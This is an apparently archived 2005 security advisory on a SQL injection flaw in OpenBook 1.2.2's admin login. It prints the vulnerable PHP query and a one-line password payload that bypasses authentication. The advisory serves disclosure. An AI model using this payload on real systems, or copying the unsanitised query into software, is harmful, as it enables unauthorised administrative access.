[SVadvisory] - SQL injection in OpenBook 1.2.2

2005-08-02T00:00:00
ID SECURITYVULNS:DOC:9360
Type securityvulns
Reporter Securityvulns
Modified 2005-08-02T00:00:00

Description

SVadvisory#12 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Title: SQl injection
Product: OpenBook
Version: 1.2.2
Site: http://openbook.sourceforge.net/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerabilities


Code: function auth_user($userid, $password) { global $HTTP_POST_VARS; global $admin_table;

    $userid=$HTTP_POST_VARS['userid'];
    $password=$HTTP_POST_VARS['password'];

    db_connect();

    $query="SELECT userid "
                                    ."FROM $admin_table "
                                    ."WHERE userid='$userid' AND password=password('$password')";
    $result=mysql_query($query);

    if(!mysql_num_rows($result))
    // no matches
    {
            return 0;
    }
    else
    // match found so return userid
    {
            $query_data=mysql_fetch_array($result);
            return $query_data['userid'];
    }

}// end auth_user()

Variable $userid, $password in admin.php are not checked before premises in SQL request, because of this possible produce SQL-injection, after which, any user can gain access to admin panels

Here is idle time example substitutions:

User ID: admin Password: no') or 1/*


Bug Found



Search Vulnerabilities Team - www.svt.nukleon.us